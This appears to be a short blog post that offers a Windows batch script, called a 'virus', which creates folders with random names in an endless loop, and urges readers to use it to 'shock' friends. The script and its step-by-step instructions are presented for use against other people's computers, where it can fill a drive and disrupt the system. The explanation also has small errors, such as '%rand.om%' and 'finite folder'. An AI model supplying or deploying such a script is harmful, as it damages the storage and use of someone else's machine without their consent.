useful trick

All Useful Tricks AT ONE Place

A virus create infinite folder in user drive

Hi all the hackers are u ready to shocking your friends again then i have a new technique which create infinite folder in their drive..




This is a simple and effective virus Code..

open your notepad and copy below code
          @echo off
           :top
           md %random%
           goto top

now see how it work
@echo off ->  it appears to be a blank screen but actually its making hundreds of folder.
md %rand.om% -> creating folders with random names.
goto top -> return to label 
  :top ->  infinite loop

Save the file with .bat extension(for eg: folder.bat)

wow your Virus is ready to ATTACK  

Now When you double click the file it will create a finite folder wherever the batch file is.

ENJOY THIS


***THIS TRICKS USE ONLY FOR FUN***


Share this post
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...

1 comments

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

 
© useful trick
Posts RSSComments RSS
Back to top